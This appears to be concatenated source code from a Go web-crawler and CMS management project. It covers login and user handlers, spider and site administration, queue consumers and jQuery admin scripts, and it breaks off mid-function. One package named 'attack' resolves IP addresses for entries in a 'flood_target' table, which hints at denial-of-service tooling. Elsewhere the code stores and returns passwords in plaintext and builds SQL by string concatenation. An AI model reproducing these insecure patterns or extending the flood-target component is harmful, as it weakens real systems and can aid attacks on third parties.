s = Status{"500", "内部错误导致登录失败."}
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
result, err := stmtOut.Query(un, pd)
defer func() {
stmtOut.Close()
result.Close()
}()
if err != nil {
log.Printf("%s", err)
// http.Redirect(w, r, ERROR_PAGE_NAME, 301)
s = Status{"500", "内部错误导致登录失败."}
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if result.Next() {
u := SpStatUser{}
u.Role = &SpStatRole{}
u.Access = &SpStatAccess{}
var g string
if err := result.Scan(&u.Id, &u.UserName, &u.Password, &u.Role.Id, &u.Role.Name, &u.Role.Privilege, &u.Role.Menu, &u.Access.Id, &g, &u.Access.Rule); err != nil {
log.Printf("%s", err)
s = Status{"500", "内部错误导致登录失败."}
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
} else {
u.Access.Group = strings.Split(g, ";")
//
uSession, _ := json.Marshal(u)
session.Set(SESSION_KEY_QUSER, uSession)
s = Status{"200", "登录成功"}
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
} else {
log.Printf("%s", err)
s = Status{"403", "登录失败,用户名/密码错误"}
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
}
func ViewUsersAction(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
redisPool *sexredis.RedisPool, cfg *common.Cfg, session sessions.Session, ms []*SpStatMenu, render render.Render) {
var (
userRelation *UserRelation
userRelations []*UserRelation
menu []*SpStatMenu
user SpStatUser
con string
totalN int64
destPn int64
)
path := r.URL.Path
r.ParseForm()
value := session.Get(SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &user)
} else {
log.Printf("session stroe type error")
http.Redirect(w, r, ERROR_PAGE_NAME, 301)
return
}
switch user.Access.Rule {
case GROUP_PRI_ALL:
case GROUP_PRI_ALLOW:
con = "WHERE a.id IN(" + strings.Join(user.Access.Group, ",") + ")"
case GROUP_PRI_BAN:
con = "WHERE a.id NOT IN(" + strings.Join(user.Access.Group, ",") + ")"
default:
log.Printf("group private erros")
}
for _, elem := range ms {
if (user.Role.Menu & elem.Id) == elem.Id {
menu = append(menu, elem)
}
}
stmtOut, err := db.Prepare("SELECT COUNT(*) FROM sp_user a " + con)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, ERROR_PAGE_NAME, 301)
return
}
row := stmtOut.QueryRow()
if err = row.Scan(&totalN); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, ERROR_PAGE_NAME, 301)
return
}
//page
if r.URL.Query().Get("p") != "" {
destPn, _ = strconv.ParseInt(r.URL.Query().Get("p"), 10, 64)
} else {
destPn = 1
}
stmtOut, err = db.Prepare(`SELECT a.id, a.username, a.password, a.roleid, a.accessid,
b.name, c.pri_rule FROM sp_user a LEFT JOIN sp_role b ON a.roleid = b.id
LEFT JOIN sp_access_privilege c ON a.accessid = c.id ` + con + " GROUP BY a.id ORDER BY a.id DESC LIMIT ?, ?")
rows, err := stmtOut.Query(cfg.PageSize*(destPn-1), cfg.PageSize)
defer func() {
stmtOut.Close()
rows.Close()
}()
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, ERROR_PAGE_NAME, 301)
return
}
for rows.Next() {
userRelation = &UserRelation{}
if err := rows.Scan(&userRelation.User.Id, &userRelation.User.UserName, &userRelation.User.Password,
&userRelation.Role.Id, &userRelation.Access.Id, &userRelation.Role.Name,
&userRelation.Access.Rule); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, ERROR_PAGE_NAME, 301)
return
}
userRelations = append(userRelations, userRelation)
}
paginator := util.NewPaginator(r, cfg.PageSize, totalN)
ret := struct {
Menu []*SpStatMenu
Result []*UserRelation
Paginator *util.Paginator
User *SpStatUser
}{menu, userRelations, paginator, &user}
index := strings.LastIndex(path, "/")
render.HTML(200, path[index+1:], ret)
}
func ViewUserAction(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
redisPool *sexredis.RedisPool, cfg *common.Cfg, session sessions.Session, ms []*SpStatMenu, render render.Render) (int, string) {
var (
user SpStatUser
)
r.ParseForm()
id, err := url.QueryUnescape(strings.TrimSpace(r.PostFormValue("id")))
user.Id, _ = strconv.ParseInt(id, 10, 64)
stmtOut, err := db.Prepare("SELECT username, password FROM sp_user WHERE id = ?")
defer stmtOut.Close()
row := stmtOut.QueryRow(user.Id)
err = row.Scan(&user.UserName, &user.Password)
if err != nil {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
if js, err := json.Marshal(user); err != nil {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
} else {
return http.StatusOK, string(js)
}
}
func EditUserAction(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
redisPool *sexredis.RedisPool, cfg *common.Cfg, session sessions.Session, ms []*SpStatMenu, render render.Render) (int, string) {
var (
user SpStatUser
)
r.ParseForm()
id, err := url.QueryUnescape(strings.TrimSpace(r.PostFormValue("id")))
user.Id, _ = strconv.ParseInt(id, 10, 64)
user.UserName, err = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("userName")))
user.Password, err = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("password")))
if user.UserName == "" || user.Password == "" {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
if err != nil {
log.Printf("post param parse fails %s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
stmtIn, err := db.Prepare("UPDATE sp_user SET username=?, password=? WHERE id = ?")
defer stmtIn.Close()
if _, err = stmtIn.Exec(user.UserName, user.Password, user.Id); err != nil {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
js, _ := json.Marshal(Status{"200", "操作成功"})
return http.StatusOK, string(js)
}
func AddUserAction(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
redisPool *sexredis.RedisPool, cfg *common.Cfg, session sessions.Session, ms []*SpStatMenu, render render.Render) (int, string) {
r.ParseForm()
userName, err := url.QueryUnescape(strings.TrimSpace(r.PostFormValue("userName")))
password, err := url.QueryUnescape(strings.TrimSpace(r.PostFormValue("password")))
if userName == "" || password == "" {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
tx, err := db.Begin()
if err != nil {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
stmtIn, err := tx.Prepare("INSERT INTO sp_user (username, password) VALUES(?, ?)")
defer stmtIn.Close()
if err != nil {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
result, err := stmtIn.Exec(userName, password)
if err != nil {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
id, err := result.LastInsertId()
if err != nil {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
stmtInAccess, err := tx.Prepare("INSERT INTO sp_access_privilege(pri_group, pri_rule) VALUES(?, ?)")
defer stmtInAccess.Close()
if err != nil {
tx.Rollback()
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
result, err = stmtInAccess.Exec(id, GROUP_PRI_ALLOW)
if err != nil {
tx.Rollback()
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
accessId, err := result.LastInsertId()
if err != nil {
tx.Rollback()
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
stmtInUpdate, err := tx.Prepare("UPDATE sp_user SET accessid = ? WHERE id = ?")
defer stmtInUpdate.Close()
if err != nil {
tx.Rollback()
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
_, err = stmtInUpdate.Exec(accessId, id)
if err != nil {
tx.Rollback()
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
if err := tx.Commit(); err != nil {
tx.Rollback()
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
js, _ := json.Marshal(Status{"200", "操作成功"})
return http.StatusOK, string(js)
}<file_sep>package handler
import (
"database/sql"
_"github.com/go-sql-driver/mysql"
"github.com/go-martini/martini"
"github.com/huzorro/ospider/web/user"
"net/http"
"log"
"github.com/martini-contrib/sessions"
"encoding/json"
"strings"
"strconv"
"reflect"
"net/url"
"github.com/martini-contrib/render"
"github.com/huzorro/ospider/util"
"time"
"github.com/huzorro/ospider/common"
)
type QueueName struct {
Task string `json:"task"`
Result string `json:"result"`
}
type Manager struct {
Id int64 `json:"id"`
Uid int64 `json:"uid"`
Name string `json:"name"`
QueueName
QueueNameStr string `json:"queueName"`
Status int64 `json:"status"`
Logtime string `json:"logtime"`
}
type SpiderRelation struct {
Manager
user.SpStatUser
}
func GetSpidersApi(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
manager Manager
managers []Manager
js []byte
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
sqlStr := `select id, uid, name, queue_name_json, status, logtime from spider_manager where status = 1`
stmtOut, err := db.Prepare(sqlStr)
rows, err := stmtOut.Query()
defer func () {
stmtOut.Close()
rows.Close()
}()
if err != nil {
log.Printf("%s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
for rows.Next() {
if err := rows.Scan(&manager.Id, &manager.Uid, &manager.Name,
&manager.QueueNameStr, &manager.Status, &manager.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
if err := json.Unmarshal([]byte(manager.QueueNameStr), &manager.QueueName); err != nil {
log.Printf("json Unmarshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
managers = append(managers, manager)
}
if js, err = json.Marshal(managers); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func GetSpider(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
manager Manager
js []byte
spUser user.SpStatUser
con string
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = " a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
case user.GROUP_PRI_BAN:
con = " a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
default:
log.Printf("group private erros")
}
sqlStr := `select id, uid, name, queue_name_json, status, logtime from spider_manager where ` +
con + " id = ?"
stmtOut, err := db.Prepare(sqlStr)
id, _ := strconv.Atoi(r.PostFormValue("Id"))
rows, err := stmtOut.Query(id)
defer func () {
stmtOut.Close()
rows.Close()
}()
if err != nil {
log.Printf("%s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if rows.Next() {
if err := rows.Scan(&manager.Id, &manager.Uid, &manager.Name,
&manager.QueueNameStr, &manager.Status, &manager.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
if err := json.Unmarshal([]byte(manager.QueueNameStr), &manager.QueueName); err != nil {
log.Printf("json Unmarshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
}
if js, err = json.Marshal(manager); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func EditSpider(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
manager Manager
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&manager).Elem()
rValue := reflect.ValueOf(&manager).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknow type %s", p)
}
}
}
manager.Task, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Task")))
manager.Result, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Result")))
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `update spider_manager set name = ?, queue_name_json = ?, status = ?
where id = ? and uid = ?`
stmtIn, err := db.Prepare(sqlStr)
defer func () {
stmtIn.Close()
}()
if js, err = json.Marshal(manager.QueueName); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if _, err = stmtIn.Exec(manager.Name, js, manager.Status, manager.Id, spUser.Id); err != nil {
log.Printf("update spider fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func AddSpider(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
manager Manager
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&manager).Elem()
rValue := reflect.ValueOf(&manager).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknow type %s", p)
}
}
}
manager.Task, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Task")))
manager.Result, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Result")))
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `insert into spider_manager(uid, name, queue_name_json, logtime)
values(?, ?, ?, ?)`
stmtIn, err := db.Prepare(sqlStr)
defer stmtIn.Close()
if err != nil {
log.Printf("db prepare fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if js, err = json.Marshal(manager.QueueName); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if _, err := stmtIn.Exec(spUser.Id, manager.Name, string(js), time.Now().Format("2006-01-02 15:04:05")); err != nil {
log.Printf("stmtIn exec fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func GetSpiders(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
cfg *common.Cfg, session sessions.Session, ms []*user.SpStatMenu, render render.Render) {
var (
spiderRelation *SpiderRelation
spiderRelations []*SpiderRelation
menu []*user.SpStatMenu
spUser user.SpStatUser
con string
totalN int64
destPn int64
)
path := r.URL.Path
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = "WHERE a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ")"
case user.GROUP_PRI_BAN:
con = "WHERE a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ")"
default:
log.Printf("group private erros")
}
for _, elem := range ms {
if (spUser.Role.Menu & elem.Id) == elem.Id {
menu = append(menu, elem)
}
}
stmtOut, err := db.Prepare("SELECT COUNT(*) FROM spider_manager a " + con)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
row := stmtOut.QueryRow()
if err = row.Scan(&totalN); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
//page
if r.URL.Query().Get("p") != "" {
destPn, _ = strconv.ParseInt(r.URL.Query().Get("p"), 10, 64)
} else {
destPn = 1
}
sqlStr := `select a.id, a.uid, b.username, a.name, a.queue_name_json, a.status, a.logtime
from spider_manager a left join sp_user b on a.uid = b.id
` + con + `order by id desc limit ?, ?`
log.Printf("%s", sqlStr)
stmtOut, err = db.Prepare(sqlStr)
defer stmtOut.Close()
rows, err := stmtOut.Query(cfg.PageSize*(destPn-1), cfg.PageSize)
defer rows.Close()
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
for rows.Next() {
spiderRelation = &SpiderRelation{}
if err := rows.Scan(&spiderRelation.Manager.Id,&spiderRelation.Manager.Uid,
&spiderRelation.UserName, &spiderRelation.Name, &spiderRelation.QueueNameStr,
&spiderRelation.Manager.Status, &spiderRelation.Manager.Logtime); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
if err := json.Unmarshal([]byte(spiderRelation.QueueNameStr), &spiderRelation.QueueName); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
spiderRelations = append(spiderRelations, spiderRelation)
}
paginator := util.NewPaginator(r, cfg.PageSize, totalN)
ret := struct {
Menu []*user.SpStatMenu
Result []*SpiderRelation
Paginator *util.Paginator
User *user.SpStatUser
}{menu, spiderRelations, paginator, &spUser}
if path == "/" {
render.HTML(200, "spiderview", ret)
} else {
index := strings.LastIndex(path, "/")
render.HTML(200, path[index+1:], ret)
}
}<file_sep>package attack
import (
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
"encoding/json"
"github.com/huzorro/ospider/util"
"net"
)
type UpdateHost struct {
cfg common.Ospider
}
func NewUpdateHost(co common.Ospider) *UpdateHost {
return &UpdateHost{cfg:co}
}
func (self *UpdateHost) Process(payload string) {
var (
attack handler.FloodTarget
)
self.cfg.Log.Println("update host...")
if err := json.Unmarshal([]byte(payload), &attack); err != nil {
self.cfg.Log.Printf("json Unmarshal fails %s", err)
return
}
sqlStr := `update spider_flood_target set host = ? where url = ? and status = 1`
stmtIn, err := self.cfg.Db.Prepare(sqlStr)
defer stmtIn.Close()
if err != nil {
self.cfg.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
return
}
ip, err := util.LookupHost(attack.Url)
if err != nil {
self.cfg.Log.Println("lookup host fails for api")
ips, err := net.LookupIP(attack.Url)
if err == nil {
if ips[0].String() != "127.0.0.1" {
attack.Host = ips[0].String()
}
}
} else {
attack.Host = ip
}
self.cfg.Log.Printf("lookup host %s", attack.Host)
_, err = stmtIn.Exec(attack.Host, attack.Url)
if err != nil {
self.cfg.Log.Printf("update flood target host fails %s", err)
return
}
}
<file_sep>package cms
import (
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
"encoding/json"
)
type CommitMysql struct {
common.Ospider
}
func NewCommitMysql(co common.Ospider) *CommitMysql {
return &CommitMysql{co}
}
func (self *CommitMysql) Process(payload string) {
var (
site handler.Site
)
if err := json.Unmarshal([]byte(payload), &site); err != nil {
self.Log.Printf("json Unmarshal fails %s", err)
return
}
sqlStr := `insert into spider_history (uid, siteid, url, result_json)
values(?, ?, ?, ?)`
stmtIn, err := self.Db.Prepare(sqlStr)
defer stmtIn.Close()
if err != nil {
self.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
return
}
if _, err := stmtIn.Exec(site.Uid, site.Id, site.Rule.Url, payload); err != nil {
self.Log.Printf("stmtIn.Exec() fails %s", err)
return
}
}
<file_sep>
$(function() {
$("input[name=Url]").change(function () {
console.log($("input[name=Url]").val());
// var htmls = [];
$.ajax({
url:$(this).val() + "/api/category",
type:"get",
cache:false,
dataType:"json",
success:function(result) {
var htmls = [];
// htmls.push($("select[name=Category]").html());
$.each(result.data, function(key, value){
htmls.push("<option value=" + JSON.stringify(value) + ">" + value.title + "</option>");
});
$("select[name=Category]").html(htmls.join(""));
}
});
$.ajax({
url:$(this).val() + "/api/member",
type:"get",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result.data, function(key, value){
htmls.push("<option value=" + JSON.stringify(value) + ">" + value.nickname + "</option>");
});
$("select[name=Member]").html(htmls.join(""));
}
});
$.ajax({
url:"/api/rules",
type:"post",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result, function(key, value){
htmls.push("<option value=" + value.id + ">" + value.name + "</option>");
});
$("select[name=RuleId]").html(htmls.join(""));
}
});
$.ajax({
url:"/api/crontabs",
type:"post",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result, function(key, value){
htmls.push("<option value=" + value.id + ">" + value.name + "</option>");
});
$("select[name=CronId]").html(htmls.join(""));
}
});
})
// $("select[name=Spiderid]").load(function() {
// alert("文档加载完毕!");
// console.log("select load....");
// // $.ajax({
// // url:"/api/spiders",
// // type:"post",
// // cache:false,
// // dataType:"json",
// // success:spiders
// // });
// });
$("#add").click(function() {
// console.log("Spiderid" + $("select[name=SpiderId]").val());
var arr = [];
$("input[name=Position]:checked").each(function(){
arr.push(parseInt($(this).val()));
});
var category = JSON.parse($("select[name=Category]").val());
var member = JSON.parse($("select[name=Member]").val());
$.ajax({
url : "/site/add",
data : {Name:$("input[name=Name]").val(),
Url:$("input[name=Url]").val(), Category:category.id,
CategoryTitle:category.title,
ModelId:category.model, GroupId:$("input[name=GroupId]").val(),
Member:member.uid, NickName:member.nickname,
Position:eval(arr.join('+')),
Display:$("input[name=Display]:checked").val(), Check:$("input[name=Check]:checked").val(),
RuleId:$("select[name=RuleId]").val(), CronId:$("select[name=CronId]").val()
},
type : "post",
cache : false,
dataType : "json",
success: commonInfo
});
});
// $("#my-tab-content").delegate("button[name=operate]", "click", function() {
// console.log($(this).val());
// $.ajax({
// url : "/key/one",
// data : {Id:$(this).val()},
// type : "post",
// cache : false,
// dataType : "json",
// success: keyone
// });
// });
$("button[name=operate]").click(function() {
console.log($(this).val() + "Abc");
$.ajax({
url : "/site/one",
data : {Id:$(this).val()},
type : "post",
cache : false,
dataType : "json",
success: one
});
});
$("#edit").click(function() {
var arr = [];
$("input[name=Position_edit]:checked").each(function(){
arr.push(parseInt($(this).val()));
});
var category = JSON.parse($("#Category").val());
var member = JSON.parse($("#Member").val());
$.ajax({
url : "/site/edit",
data : {Id:$("#Id").val(), Name:$("#Name").val(),
Url:$("#Url").val(), Category:category.id,
CategoryTitle:category.title,
ModelId:category.model,
Member:member.uid, NickName:member.nickname,
Position:eval(arr.join('+')),
Display:$("input[name=Display_edit]:checked").val(), Check:$("input[name=Check_edit]:checked").val(),
RuleId:$("#RuleId").val(), CronId:$("#CronId").val(),
Status:$("input[name=Status]:checked").val()
},
type : "post",
cache : false,
dataType : "json",
success: commonInfo
});
});
$("#infoModal .btn").click(function(){
location.reload();
});
$("#close").click(function(){
location.reload();
});
});
function commonInfo(json) {
if (json.status !== undefined) {
$('#infoModal').modal('toggle');
$('#infoModal p').text(json.text);
// location.reload();
return
}
}
function one(json) {
console.log(json);
$('#editRuleModal').modal('toggle');
if (json.status !== undefined && json.text !== undefined) {
$("#Status").html(json.text);
} else {
var htmls = [];
$("#Id").val(json.id);
$("#Name").val(json.name);
$("#Url").val(json.url);
//
$.ajax({
url:json.url + "/api/category",
type:"get",
cache:false,
dataType:"json",
success:function(result) {
var htmls = [];
// htmls.push($("select[name=Category]").html());
$.each(result.data, function(key, value){
htmls.push("<option value=" + JSON.stringify(value) + ">" + value.title + "</option>");
});
$("#Category").html(htmls.join(""));
$("#Category>option").each(function() {
if($(this).text() == json.document_set.title) {
$(this).attr("selected","selected");
}
});
}
});
$.ajax({
url:json.url + "/api/member",
type:"get",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result.data, function(key, value){
htmls.push("<option value=" + JSON.stringify(value) + ">" + value.nickname + "</option>");
});
$("#Member").html(htmls.join(""));
$("#Member>option").each(function() {
if($(this).text() == json.document_set.nickname) {
$(this).attr("selected","selected");
}
});
}
});
$.ajax({
url:"/api/rules",
type:"post",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result, function(key, value){
htmls.push("<option value=" + value.id + ">" + value.name + "</option>");
});
$("#RuleId").html(htmls.join(""));
$("#RuleId>option").each(function() {
if($(this).text() == json.Rule.name) {
$(this).attr("selected","selected");
}
});
}
});
$.ajax({
url:"/api/crontabs",
type:"post",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result, function(key, value){
htmls.push("<option value=" + value.id + ">" + value.name + "</option>");
});
$("#CronId").html(htmls.join(""));
$("#CronId>option").each(function() {
if($(this).text() == json.Cron.name) {
$(this).attr("selected","selected");
}
});
}
});
$("input[name=Position_edit]").each(function(){
if(($(this).val() & json.document_set.position) == $(this).val()) {
$(this).attr("checked","checked");
}
});
$("input[name=Display_edit]").each(function(){
if($(this).val() == json.document_set.display) {
$(this).attr("checked","checked");
}
});
$("input[name=Check_edit]").each(function(){
if($(this).val() == json.document_set.check) {
$(this).attr("checked","checked");
}
});
if (json.status) {
htmls.push('<input type="radio" name="Status" value=0 >停用<input type="radio" name="Status" value=1 checked>启用');
} else {
htmls.push('<input type="radio" name="Status" value=0 checked>停用<input type="radio" name="Status" value=1 >启用');
}
$("#Status").html(htmls.join(""));
}
}
<file_sep>package processor
import (
"encoding/json"
"fmt"
"time"
"github.com/adjust/rmq"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
)
type Task struct {
Cfg
common.Ospider
rmq.Connection
}
type Consumer struct {
name string
count int
before time.Time
task Task
}
func NewConsumer(tag int, task Task) *Consumer {
return &Consumer{
name: fmt.Sprintf("consumer%d", tag),
count: 0,
before: time.Now(),
task: task,
}
}
func (consumer *Consumer) Consume(delivery rmq.Delivery) {
var (
site handler.Site
linkQueue rmq.Queue
err error
)
consumer.count++
linkQueue = consumer.task.Connection.OpenQueue(consumer.task.Cfg.LinkQueueName)
consumer.task.Log.Printf("%s consumed %d %s", consumer.name, consumer.count, delivery.Payload())
if err = json.Unmarshal([]byte(delivery.Payload()), &site); err != nil {
consumer.task.Log.Printf("json Unmarshal fails %s", err)
delivery.Ack()
return
}
attach := make(map[string]interface{})
attach["site"] = site
spider, ext := NewSpiderLink(consumer.task.Cfg, attach)
if err := spider.Run(site.Rule.Url); err != nil {
links := ext.Attach["links"].([]string)
for _, v := range links {
site.Rule.Url = v
if siteStr, err := json.Marshal(site); err != nil {
consumer.task.Log.Printf("json Marshal fails %s", err)
} else {
linkQueue.Publish(string(siteStr))
}
}
}
delivery.Ack()
}
func (self Task) Handler() {
var (
taskQueue rmq.Queue
)
taskQueue = self.Connection.OpenQueue(self.Cfg.TaskQueueName)
taskQueue.StartConsuming(self.UnackedLimit, 500*time.Millisecond)
for i := 0; i < self.NumConsumers; i++ {
name := fmt.Sprintf("consumer %d", i)
taskQueue.AddConsumer(name, NewConsumer(i, self))
}
}
<file_sep>package processor
import (
"encoding/json"
"fmt"
"time"
"strings"
"github.com/adjust/rmq"
"github.com/gosexy/redis"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
)
type TaskContent struct {
Cfg
common.Ospider
rmq.Connection
}
type ConsumerContent struct {
name string
count int
before time.Time
content TaskContent
}
func NewConsumerLink(tag int, task TaskContent) *ConsumerContent {
return &ConsumerContent{
name: fmt.Sprintf("consumer%d", tag),
count: 0,
before: time.Now(),
content: task,
}
}
func (consumer *ConsumerContent) Consume(delivery rmq.Delivery) {
var (
site handler.Site
resultQueue rmq.Queue
err error
)
consumer.count++
resultQueue = consumer.content.Connection.OpenQueue(consumer.content.Cfg.ResultQueueName)
consumer.content.Log.Printf("%s consumed %d %s", consumer.name, consumer.count, delivery.Payload())
if err = json.Unmarshal([]byte(delivery.Payload()), &site); err != nil {
consumer.content.Log.Printf("json Unmarshal fails %s", err)
delivery.Ack()
return
}
attach := make(map[string]interface{})
attach["site"] = site
//查找爬取历史
var (
redisClient *redis.Client
reviewStr string
review handler.Site
)
if redisClient, err = consumer.content.Ospider.P.Get(); err != nil {
